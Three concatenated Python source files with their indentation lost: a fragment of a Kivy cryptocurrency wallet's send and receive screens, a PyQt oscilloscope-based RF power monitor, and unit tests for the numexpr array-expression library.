msg.append(_("Additional fees") + ": " + self.app.format_amount_and_units(x_fee_amount))
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
msg.append(_("Enter your PIN code to proceed"))
self.app.protected('\n'.join(msg), self.send_tx, (tx, message))
def send_tx(self, tx, message, password):
if self.app.wallet.has_password() and password is None:
return
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx, self.payment_request)
self.app.wallet.set_label(tx.txid(), message)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
def expiry(self):
return self.app.electrum_config.get('request_expiry', 3600) # 1 hour
def clear(self):
self.screen.address = ''
self.screen.amount = ''
self.screen.message = ''
self.screen.lnaddr = ''
def set_address(self, addr):
self.screen.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.screen.status = ''
if req:
self.screen.message = req.get('memo', '')
amount = req.get('amount')
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.screen.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum.util import create_bip21_uri
amount = self.screen.amount
if amount:
a, u = self.screen.amount.split()
assert u == self.app.base_unit
amount = Decimal(a) * pow(10, self.app.decimal_point())
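# e.g. with base_unit "mBTC" (decimal_point() == 5), an amount string of
# "0.5 mBTC" becomes Decimal("0.5") * 10**5 = 50000 satoshis.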
return create_bip21_uri(self.screen.address, amount, self.screen.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.screen.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.screen.message
if lightning:
payment_hash = self.app.wallet.lnworker.add_invoice(amount, message, self.expiry())
request, direction, is_paid = self.app.wallet.lnworker.invoices.get(payment_hash.hex())
key = payment_hash.hex()
else:
addr = self.screen.address or self.app.wallet.get_unused_address()
if not addr:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.screen.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req):
is_lightning = req.get('type') == PR_TYPE_LN
if not is_lightning:
address = req['address']
key = address
else:
key = req['rhash']
address = req['invoice']
amount = req.get('amount')
description = req.get('memo', '')
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description
ci['status'] = get_request_status(req)
ci['is_expired'] = req['status'] == PR_EXPIRED
return ci
def update(self):
if not self.loaded:
return
_list = self.app.wallet.get_sorted_requests()
requests_container = self.screen.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list if item.get('status') != PR_PAID]
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
def clear_requests_dialog(self):
expired = [req for req in self.app.wallet.get_sorted_requests() if req['status'] == PR_EXPIRED]
if len(expired) == 0:
return
def callback(c):
if c:
for req in expired:
is_lightning = req.get('lightning', False)
key = req['rhash'] if is_lightning else req['address']
self.app.wallet.delete_request(key)
self.update()
d = Question(_('Delete expired requests?'), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
cost_power_monitor.py | #!/usr/bin/python3
import sys
import string
import time
import numpy as np
import datetime
from . import ivi
from . import usbtmc
from multiprocessing import Process, Queue, cpu_count
import multiprocessing
from scipy.optimize import leastsq,broyden1
from scipy import stats
from PyQt5 import QtCore
from PyQt5.QtWidgets import *
import pyqtgraph
# importing this after pyqt5 tells pyqtgraph to use qt5 instead of 4
channel_assignment = {1: "nothing", 2: "internal voltage", 3: "current", 4: "nothing"}
sim = False
volcal = 2250
volcal_std = 50
resistance = 4.2961608775
frequency = 13560000
result_queue = Queue(100)
voltage_ref_phase = 0
voltage_ref_phase_std = 0
current_ref_phase = 0
current_ref_phase_std = 0
ref_size = 10 # Number of phase reference points to average over
scope_id = None
def get_scope(scope_id):
"Scope database. Add yours here!"
device = usbtmc.Instrument(scope_id)
idV = device.idVendor
idP = device.idProduct
device.close()
if idV == 0x0957 and idP == 0x175D:
scope = ivi.agilent.agilentMSO7104B(scope_id)
# Lecroy scopes, seems to work for multiple models which send the same idP
# tested for WR8404M, HDO6104A
elif idV == 0x05ff and idP == 0x1023:
scope = ivi.lecroy.lecroyWR8404M(scope_id)
elif idV == 0x0957 and idP == 6042: # York, untested
scope = ivi.agilent.agilentDSOX2004A(scope_id)
else:
scope = ivi.lecroy.lecroyWR8404M(scope_id) # your IVI scope here!
return scope
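# Hedged sketch of what "Add yours here!" means above (the IDs below are made
# up for illustration; substitute your scope's USB vendor/product IDs and the
# matching IVI driver class):
#     elif idV == 0x1234 and idP == 0x5678:
#         scope = ivi.lecroy.lecroyWR8404M(scope_id)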
class QHLine(QFrame):
def __init__(self):
super(QHLine, self).__init__()
self.setFrameShape(QFrame.HLine)
self.setFrameShadow(QFrame.Sunken)
class main_window(QWidget):
def __init__(self):
super().__init__()
l_main_Layout = QHBoxLayout()
this_data_monitor = data_monitor()
this_ctrl_panel = ctrl_panel()
l_main_Layout.addLayout(this_data_monitor)
l_main_Layout.addLayout(this_ctrl_panel)
self.rand_data = np.random.normal(size=100)
self.setLayout(l_main_Layout)
self.setGeometry(300, 300, 1000, 450)
self.setWindowTitle("COST Power Monitor")
self.show()
class data_monitor(QVBoxLayout):
def __init__(self):
super().__init__()
self.results = []
self.tab_bar = QTabWidget()
pyqtgraph.setConfigOption('background', 'w')
pyqtgraph.setConfigOption('foreground', 'k')
self.graph = pyqtgraph.PlotWidget(name='Plot1')
self.graph.setLabel("left","power / W")
self.graph.setLabel("bottom","voltage / V")
self.table = QTableWidget()
self.table.setColumnCount(5)
self.table.setHorizontalHeaderLabels(["Voltage / V", "Current / A",
"Phaseshift / rad", "Power / W", "Time"])
self.tab_bar.addTab(self.table, "Table")
self.tab_bar.addTab(self.graph, "Graph")
self.update_timer = QtCore.QTimer(self)
self.update_timer.setInterval(100)
self.update_timer.timeout.connect(self.update)
self.update_timer.start()
btn_layout = QHBoxLayout()
clear_btn = QPushButton("Clear")
clear_btn.clicked.connect(self.clear_data)
save_btn = QPushButton("Save to Disk")
save_btn.clicked.connect(self.save_data)
copy_btn = QPushButton("Copy to Clipboard")
copy_btn.clicked.connect(self.copy_data)
plot_btn = QPushButton("Plot Data")
plot_btn.clicked.connect(self.update_graph)
btn_layout.addWidget(clear_btn)
btn_layout.addWidget(plot_btn)
btn_layout.addWidget(copy_btn)
btn_layout.addWidget(save_btn)
self.power_dspl = QLabel("0 W")
self.addWidget(self.power_dspl)
self.addWidget(self.tab_bar)
self.addLayout(btn_layout)
def clear_data(self):
global result_queue
result_queue.close()
result_queue = Queue(100)
self.table.setRowCount(0)
self.results = []
def save_data(self):
        separator = "\t "
next_line = " \n"
filename = QFileDialog.getSaveFileName(caption='Save File',
filter='*.txt')
if filename[0]:
phaseshift = (str(voltage_ref_phase - current_ref_phase) + " +- " +
str(voltage_ref_phase_std + current_ref_phase_std))
header = ("## cost-power-monitor file ## \n"+
"# " + str(datetime.datetime.now()) + "\n" +
"# Reference phaseshift: " + phaseshift + "\n" +
"# Calibration factor: " + str(volcal) + "\n" +
"# Channel Settings: " + str(channel_assignment) + "\n\n")
            table_header = ("Voltage" + separator + "Current" + separator +
                "Phaseshift" + separator + "Power" + separator + "Time" + next_line)
lines = [header, table_header]
for x in range(self.table.rowCount()):
this_line = ""
for y in range(self.table.columnCount()):
                    this_line = this_line + str(self.table.item(x,y).text()) + separator
lines.append(this_line + next_line)
            try:
                # use a context manager so the file is closed even on error
                with open(filename[0], 'w') as f:
                    f.writelines(lines)
            except Exception:
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Error')
mb.setText('Could not save file.')
mb.setStandardButtons(QMessageBox.Ok)
mb.exec_()
def copy_data(self):
QApplication.clipboard().setText(np.array2string(np.array(self.results)))
def update(self):
while not result_queue.empty():
new_data = result_queue.get()
if new_data:
self.results.append(new_data)
self.update_table(new_data)
self.update_power_dspl(new_data[-1])
def update_power_dspl(self, power):
self.power_dspl.setText("Power: " + str(round(power,3)) + " W")
def update_graph(self):
"""Updates the Graph with new data,
this data beeing an 2 dim array of voltage and power"""
self.graph.clear()
if self.results:
voltage = np.array(self.results)[:,0]
power = np.array(self.results)[:,3]
self.graph.plot(title="power", x=voltage, y=power, symbol='o')
def update_table(self,data):
"""Updates the table with new data.
Data is array with voltage, current, phaseshift and power"""
#print(data)
self.table.insertRow(self.table.rowCount())
for i,d in enumerate(data):
            if i == 2:
                r = 10  # round the phaseshift with high precision
            else:
                r = 3  # round the rest to three decimal places
self.table.setItem(self.table.rowCount()-1,i,QTableWidgetItem(str(round(d,r))))
time = datetime.datetime.now().time().strftime("%H:%M:%S")
self.table.setItem(self.table.rowCount()-1,self.table.columnCount()-1,QTableWidgetItem(str(time)))
self.table.scrollToBottom()
class ctrl_panel(QVBoxLayout):
def __init__(self):
super().__init__()
self.tab_bar = QTabWidget()
this_sweep_tab = sweep_tab()
this_settings_tab = settings_tab()
self.tab_bar.addTab(this_sweep_tab, "Sweep")
self.tab_bar.addTab(this_settings_tab, "Settings")
self.addWidget(self.tab_bar)
class sweep_tab(QWidget):
def __init__(self):
""" Don't look at it!"""
super().__init__()
l_main_Layout = QVBoxLayout()
self.sweeping = False
# Power stuff
power_group = QGroupBox()
power_layout = QVBoxLayout()
power_group.setLayout(power_layout)
show_power_row = QHBoxLayout()
show_power_row.addWidget(QLabel("Start/Pause Measurement"))
power_layout.addLayout(show_power_row)
power_btn_row = QHBoxLayout()
power_start_btn = QPushButton("Start")
power_start_btn.clicked.connect(self.start_sweep)
power_stop_btn = QPushButton("Pause")
power_stop_btn.clicked.connect(self.stop_sweep)
power_btn_row.addWidget(power_start_btn)
power_btn_row.addWidget(power_stop_btn)
power_layout.addLayout(power_btn_row)
l_main_Layout.addWidget(power_group)
# Reference stuff
ref_group = QGroupBox()
ref_layout = QVBoxLayout()
ref_group.setLayout(ref_layout)
show_ref_row = QHBoxLayout()
self.ref_label = QLabel("Undef")
show_ref_row.addWidget(QLabel("Reference Phaseshift:"))
show_ref_row.addWidget(self.ref_label)
ref_layout.addLayout(show_ref_row)
ref_btn_row = QHBoxLayout()
ref_start_btn = QPushButton("Find")
ref_start_btn.clicked.connect(self.find_ref)
ref_btn_row.addWidget(ref_start_btn)
ref_layout.addLayout(ref_btn_row)
l_main_Layout.addWidget(ref_group)
self.setLayout(l_main_Layout)
def start_sweep(self):
if not self.sweeping:
self.this_sweep = sweeper(channel_assignment, volcal, voltage_ref_phase, current_ref_phase)
self.this_sweep.start()
self.sweeping = True
def stop_sweep(self):
self.sweeping = False
self.this_sweep.stop()
def find_ref(self):
if not self.sweeping:
global voltage_ref_phase, current_ref_phase, voltage_ref_phase_std, current_ref_phase_std
self.this_sweep = sweeper(channel_assignment, volcal, voltage_ref_phase, current_ref_phase)
voltage_ref_phase, current_ref_phase, voltage_ref_phase_std, current_ref_phase_std = self.this_sweep.find_ref()
self.ref_label.setText(
str(round(voltage_ref_phase - current_ref_phase,10))
+ " ± "
+ str(round(voltage_ref_phase_std + current_ref_phase_std, 10)))
class settings_tab(QWidget):
def __init__(self):
super().__init__()
l_main_Layout = QVBoxLayout()
# list of connected scopes
self.scope_cbox = QComboBox()
self.scope_list()
# UI to select the scope
scope_group = QGroupBox()
scope_layout = QVBoxLayout()
scope_group.setLayout(scope_layout)
scope_sel_row = QHBoxLayout()
scope_info_row = QHBoxLayout()
scope_sel_row.addWidget(QLabel("Oscilloscope"))
scope_sel_row.addWidget(self.scope_cbox)
self.scope_cbox.setCurrentIndex(0)
self.scope_cbox.currentIndexChanged.connect(self.change_scope)
update_btn = QPushButton("Scan")
scope_sel_row.addWidget(update_btn)
self.scope_name = QLabel(" ")
scope_info_row.addWidget(self.scope_name)
self.change_scope()
scope_layout.addLayout(scope_sel_row)
scope_layout.addLayout(scope_info_row)
l_main_Layout.addWidget(scope_group)
l_main_Layout.addWidget(QHLine())
# UI to assign scope channels
chan_group = QGroupBox()
chan_layout = QVBoxLayout()
chan_group.setLayout(chan_layout)
chan_rows = []
for channel_num in range(1,5):
this_channel = channel_settings(channel_num)
chan_rows.append(this_channel)
chan_layout.addLayout(this_channel)
l_main_Layout.addWidget(chan_group)
l_main_Layout.addWidget(QHLine())
# UI to set or find voltage Calibration factor
volcal_group = QGroupBox()
volcal_layout = QVBoxLayout()
volcal_group.setLayout(volcal_layout)
volcal_row = QHBoxLayout()
self.volcal_box = QLineEdit(str(volcal))
self.volcal_box.setMaximumWidth(100)
self.volcal_box.textChanged.connect(self.change_volcal)
self.volcal_std_label = QLabel()
volcal_get = QPushButton("Find")
volcal_get.clicked.connect(self.get_volcal)
volcal_row.addWidget(QLabel("Calibration Factor: "))
volcal_row.addWidget(self.volcal_box)
volcal_row.addWidget(self.volcal_std_label)
volcal_row.addWidget(volcal_get)
volcal_layout.addLayout(volcal_row)
l_main_Layout.addWidget(volcal_group)
self.setLayout(l_main_Layout)
# monitor changes in scopelist
update_btn.clicked.connect(self.scope_list)
def change_scope(self):
global scope_id
idx = self.scope_cbox.currentIndex()
try:
device = self.devices[idx]
scope_id = "USB::%d::%d::INSTR" % (device.idVendor, device.idProduct)
manufacturer = device.manufacturer
product = device.product
except Exception as e:
print(e)
device = None
scope_id = None
manufacturer = ""
product = ""
try:
scope = get_scope(scope_id)
scope.close()
scope_known = True
mark = "✓"
except Exception as e:
print(e)
scope_known = False
mark = "✗"
self.scope_name.setText(mark + " " + manufacturer + " " + product)
def scope_list(self):
# list of connected USB devices
sel_entry = self.scope_cbox.currentText()
devices = usbtmc.list_devices()
dlist = []
for device in devices:
scope_idVendor = device.idVendor
scope_idProduct = device.idProduct
scope_label = (hex(scope_idVendor) + ":" + hex(scope_idProduct))
dlist.append(scope_label)
self.dlist, self.devices = dlist, devices
self.scope_cbox.clear()
self.scope_cbox.addItems(dlist)
idx = self.scope_cbox.findText(sel_entry)
if idx == -1:
try:
self.scope_cbox.setCurrentIndex(0)
except:
pass
else:
self.scope_cbox.setCurrentIndex(idx)
    def change_volcal(self):
        global volcal
        try:
            volcal = float(self.volcal_box.text())
        except ValueError:
            pass  # ignore incomplete input while the user is still typing
def get_volcal(self):
self.this_sweep = sweeper(channel_assignment, volcal, voltage_ref_phase, current_ref_phase)
try:
self.volcal_box.setText(str(round(self.this_sweep.calibrate(),1)))
except Exception as e:
print(e)
        if isinstance(volcal_std, (int, float)):  # np.float64 is a float subclass
            self.volcal_std_label.setText("±" + str(round(volcal_std, 1)))
        else:
            self.volcal_std_label.setText(str(volcal_std))
class channel_settings(QHBoxLayout):
def __init__(self, number):
"""Beware, Channels are numbered 1 to 4"""
super().__init__()
self.number = number
self.addWidget(QLabel("Channel " + str(self.number)))
self.chan_cbox = QComboBox()
chan_options = ["nothing", "internal voltage", "current", "external voltage"]
self.chan_cbox.addItems(chan_options)
self.addWidget(self.chan_cbox)
self.chan_cbox.setCurrentIndex(chan_options.index(channel_assignment[self.number]))
self.chan_cbox.currentIndexChanged.connect(self.change_channel)
def change_channel(self):
global channel_assignment
this_chan_ass = channel_assignment
this_chan_ass[self.number] = self.chan_cbox.currentText()
channel_assignment = this_chan_ass
class sweeper():
def __init__(self, channels, volcal, v_ref, c_ref):
global result_queue
mgr = multiprocessing.Manager()
self.channels = channels
self.volcal = volcal
self.v_ref = v_ref
self.c_ref = c_ref
self.data_queue = mgr.Queue(ref_size)
self.io_process = Process(target=self.io_worker, args=(self.data_queue, scope_id))
self.fit_process_list = []
for i in range(cpu_count()-1):
this_fit_proccess = Process(target=fit_worker,
args=(self.data_queue, result_queue, volcal, v_ref, c_ref))
self.fit_process_list.append(this_fit_proccess)
def start(self):
if not self.io_process.is_alive():
self.io_process.start()
for fit_process in self.fit_process_list:
if not fit_process.is_alive():
fit_process.start()
def stop(self):
if self.io_process.is_alive():
self.io_process.terminate()
for fit_process in self.fit_process_list:
while not self.data_queue.empty() and fit_process.is_alive():
time.sleep(1)
if fit_process.is_alive():
fit_process.terminate()
while not self.data_queue.empty():
self.data_queue.get()
def calibrate(self):
global volcal, volcal_std
ref_queue = Queue(ref_size*2) # Don't ask
self.io_process.start()
volcal_list = []
for i in range(ref_size):
data_dict = self.data_queue.get()
try:
external_voltage_data = data_dict["external voltage"]
except KeyError:
print("Channel 'External Voltage' not set.")
volcal_std = "Error, 'External Voltage' not set."
self.io_process.terminate()
return 0
voltage_data = data_dict["internal voltage"]
v_amp, v_freq, v_phase = fit_func(voltage_data)
ext_v_amp, ext_v_freq, ext_v_phase = fit_func(external_voltage_data)
volcal_list.append(ext_v_amp/v_amp)
self.io_process.terminate()
while not self.data_queue.empty():
self.data_queue.get()
volcal = np.average(volcal_list)
volcal_std = np.std(volcal_list)
return volcal
def find_ref(self):
ref_queue = Queue(ref_size*2) # Don't ask
self.io_process.start()
v_phases = []
c_phases = []
for i in range(ref_size):
data_dict = self.data_queue.get()
voltage_data = data_dict["internal voltage"]
v_amp, v_freq, v_phase = fit_func(voltage_data)
current_data = data_dict["current"]
c_amp, c_freq, c_phase = fit_func(current_data)
v_phases.append(v_phase)
c_phases.append(c_phase)
self.io_process.terminate()
while not self.data_queue.empty():
self.data_queue.get()
# Getting the average of an angle is hard:
# https://en.wikipedia.org/wiki/Mean_of_circular_quantities
mean_v_phase = np.arctan2(
np.sum(np.sin(np.array(v_phases)))/len(v_phases),
np.sum(np.cos(np.array(v_phases)))/len(v_phases)
) % (2*np.pi)
mean_c_phase = np.arctan2(
np.sum(np.sin(np.array(c_phases)))/len(c_phases),
np.sum(np.cos(np.array(c_phases)))/len(c_phases)
) % (2*np.pi)
v_phase_diff_sum = 0
c_phase_diff_sum = 0
for angle in v_phases:
# Next line seems to work. It's all very complicated.
v_phase_diff_sum = (v_phase_diff_sum
+ np.square(np.diff(np.unwrap([angle, mean_v_phase])))[0])
v_phase_std = np.sqrt(v_phase_diff_sum/len(v_phases))
for angle in c_phases:
# Next line seems to work. It's all very complicated.
c_phase_diff_sum = (c_phase_diff_sum
+ np.square(np.diff(np.unwrap([angle, mean_c_phase])))[0])
c_phase_std = np.sqrt(c_phase_diff_sum/len(c_phases))
global voltage_ref_phase, voltage_ref_phase_std
voltage_ref_phase = mean_v_phase
voltage_ref_phase_std = v_phase_std
global current_ref_phase, current_ref_phase_std
current_ref_phase = mean_c_phase
current_ref_phase_std = c_phase_std
self.v_ref = voltage_ref_phase
self.c_ref = current_ref_phase
return (voltage_ref_phase, current_ref_phase, voltage_ref_phase_std, current_ref_phase_std)
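    # The circular-mean computation in find_ref above is easy to get wrong;
    # the helper below restates it in isolation as a minimal sketch for
    # clarity (it is not called anywhere in this tool).
    @staticmethod
    def circular_mean(angles):
        """Circular mean of a sequence of angles in radians, per
        https://en.wikipedia.org/wiki/Mean_of_circular_quantities"""
        sines = np.sum(np.sin(np.array(angles))) / len(angles)
        cosines = np.sum(np.cos(np.array(angles))) / len(angles)
        # arctan2 handles the wrap-around at 0/2*pi that a naive average misses
        return np.arctan2(sines, cosines) % (2 * np.pi)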
def io_worker(self, data_queue, scope_id):
""" Gets waveforms from the scope and puts them into the data_queue."""
device = usbtmc.Instrument(scope_id)
idV = device.idVendor
device.close()
scope = get_scope(scope_id)
        while not sim:
data_dict = {}
if idV == 0x0957: # Agilent scopes want to be initialized (tested for DSO7104B)
scope.measurement.initiate()
for chan_num in self.channels:
chan_name = self.channels[chan_num]
if chan_name != "nothing":
data_dict[chan_name] = scope.channels[chan_num-1].measurement.fetch_waveform()
data_queue.put(data_dict)
def fit_worker(data_queue, result_queue, volcal, v_ref, c_ref):
"""Takes data_queue and fits a sinus. Returns 4-tuple of voltage,current, phaseshift and power if raw=False,
else a 6 tuple of amp, freq and phase for both voltage and current.
Returns a 2-tuple if cal=True: internal voltage amplitude, external voltage amplitude.
Use num to restict the amount of data the worker should fetech.
Use cal to Calibration internal/external voltage probe"""
while True:
data_dict = data_queue.get()
voltage_data = data_dict["internal voltage"]
v_amp, v_freq, v_phase = fit_func(voltage_data)
voltage_rms = v_amp/np.sqrt(2) * volcal
current_data = data_dict["current"]
c_amp, c_freq, c_phase = fit_func(current_data)
current_rms = c_amp/np.sqrt(2)/resistance
phaseshift = np.pi/2 + (c_ref - c_phase) - (v_ref - v_phase)
power = voltage_rms * current_rms * np.absolute(np.cos(phaseshift))
result = (voltage_rms, current_rms, phaseshift, power)
result_queue.put(result)
def fit_func(data):
data = np.array(data)
time = np.nan_to_num(data[:,0])
amplitude = np.nan_to_num(data[:,1])
guess_mean = np.mean(amplitude)
guess_amplitude = np.amax(amplitude)
guess_phase = 0
guess_y0 = 0
guess_frequency = frequency
data_first_guess = (guess_amplitude
*np.sin(time*guess_frequency*2*np.pi + guess_phase%(2*np.pi))
+ guess_mean)
optimize_func = lambda x: (x[0]
*np.sin(time* x[1] * 2*np.pi + x[2]%(2*np.pi))
+ x[3] - amplitude)
solution = leastsq(optimize_func,
[guess_amplitude, guess_frequency, guess_phase, guess_y0],
full_output=0)
est_ampl, est_freq, est_phase, est_y0 = solution[0]
if est_ampl < 0:
est_ampl = np.abs(est_ampl)
est_phase = est_phase + np.pi
return (est_ampl, est_freq, est_phase%(2*np.pi))
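# Hedged self-check sketch (not part of the original tool): on a clean
# synthetic sine, fit_func should recover the generating parameters.
def _fit_func_demo():
    t = np.linspace(0, 5.0 / frequency, 1000)
    wave = 3.0 * np.sin(t * frequency * 2 * np.pi + 1.0) + 0.5
    amp, freq, phase = fit_func(np.column_stack((t, wave)))
    # expect roughly amp == 3.0, freq == 13.56e6, phase == 1.0
    return amp, freq, phase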
def run():
app = QApplication(sys.argv)
this_main_window = main_window()
sys.exit(app.exec_())
|
test_numexpr.py | ###################################################################
# Numexpr - Fast numerical array expression evaluator for NumPy.
#
# License: MIT
# Author: See AUTHORS.txt
#
# See LICENSE.txt and LICENSES/*.txt for details about copyright and
# rights to use.
####################################################################
from __future__ import absolute_import, print_function
import os
import sys
import platform
import warnings
from contextlib import contextmanager
import numpy as np
from numpy import (
array, arange, empty, zeros, int32, int64, uint16, complex_, float64, rec,
copy, ones_like, where, alltrue, linspace,
sum, prod, sqrt, fmod,
sin, cos, tan, arcsin, arccos, arctan, arctan2,
sinh, cosh, tanh, arcsinh, arccosh, arctanh,
log, log1p, log10, exp, expm1, conj)
from numpy.testing import (assert_equal, assert_array_equal,
assert_array_almost_equal, assert_allclose)
from numpy import shape, allclose, array_equal, ravel, isnan, isinf
import numexpr
from numexpr import E, NumExpr, evaluate, disassemble, use_vml
import unittest
TestCase = unittest.TestCase
double = np.double
# Recommended minimum versions
minimum_numpy_version = "1.6"
class test_numexpr(TestCase):
"""Testing with 1 thread"""
nthreads = 1
def setUp(self):
numexpr.set_num_threads(self.nthreads)
def test_simple(self):
ex = 2.0 * E.a + 3.0 * E.b * E.c
sig = [('a', double), ('b', double), ('c', double)]
func = NumExpr(ex, signature=sig)
x = func(array([1., 2, 3]), array([4., 5, 6]), array([7., 8, 9]))
assert_array_equal(x, array([86., 124., 168.]))
def test_simple_expr_small_array(self):
func = NumExpr(E.a)
x = arange(100.0)
y = func(x)
assert_array_equal(x, y)
def test_simple_expr(self):
func = NumExpr(E.a)
x = arange(1e6)
y = func(x)
assert_array_equal(x, y)
def test_rational_expr(self):
func = NumExpr((E.a + 2.0 * E.b) / (1 + E.a + 4 * E.b * E.b))
a = arange(1e6)
b = arange(1e6) * 0.1
x = (a + 2 * b) / (1 + a + 4 * b * b)
y = func(a, b)
assert_array_almost_equal(x, y)
def test_reductions(self):
# Check that they compile OK.
assert_equal(disassemble(
NumExpr("sum(x**2+2, axis=None)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'sum_ddn', b'r0', b't3', None)])
assert_equal(disassemble(
NumExpr("sum(x**2+2, axis=1)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'sum_ddn', b'r0', b't3', 1)])
assert_equal(disassemble(
NumExpr("prod(x**2+2, axis=2)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'prod_ddn', b'r0', b't3', 2)])
# Check that full reductions work.
        x = zeros(10**5) + .01  # checks issue #41; integer shape (float shapes are rejected by newer NumPy)
assert_allclose(evaluate("sum(x+2,axis=None)"), sum(x + 2, axis=None))
assert_allclose(evaluate("sum(x+2,axis=0)"), sum(x + 2, axis=0))
assert_allclose(evaluate("prod(x,axis=0)"), prod(x, axis=0))
x = arange(10.0)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
x = arange(100.0)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
x = linspace(0.1, 1.0, 2000)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
# Check that reductions along an axis work
y = arange(9.0).reshape(3, 3)
assert_allclose(evaluate("sum(y**2, axis=1)"), sum(y ** 2, axis=1))
assert_allclose(evaluate("sum(y**2, axis=0)"), sum(y ** 2, axis=0))
assert_allclose(evaluate("sum(y**2, axis=None)"), sum(y ** 2, axis=None))
assert_allclose(evaluate("prod(y**2, axis=1)"), prod(y ** 2, axis=1))
assert_allclose(evaluate("prod(y**2, axis=0)"), prod(y ** 2, axis=0))
assert_allclose(evaluate("prod(y**2, axis=None)"), prod(y ** 2, axis=None))
# Check integers
x = arange(10.)
x = x.astype(int)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
# Check longs
x = x.astype(long)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
# Check complex
x = x + .1j
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
def test_in_place(self):
x = arange(10000.).reshape(1000, 10)
evaluate("x + 3", out=x)
assert_equal(x, arange(10000.).reshape(1000, 10) + 3)
y = arange(10)
evaluate("(x - 3) * y + (x - 3)", out=x)
assert_equal(x, arange(10000.).reshape(1000, 10) * (arange(10) + 1))
def test_axis(self):
y = arange(9.0).reshape(3, 3)
try:
evaluate("sum(y, axis=2)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
try:
evaluate("sum(y, axis=-3)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
try:
# Negative axis are not supported
evaluate("sum(y, axis=-1)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
def test_r0_reuse(self):
assert_equal(disassemble(NumExpr("x * x + 2", [('x', double)])),
[(b'mul_ddd', b'r0', b'r1[x]', b'r1[x]'),
(b'add_ddd', b'r0', b'r0', b'c2[2.0]')])
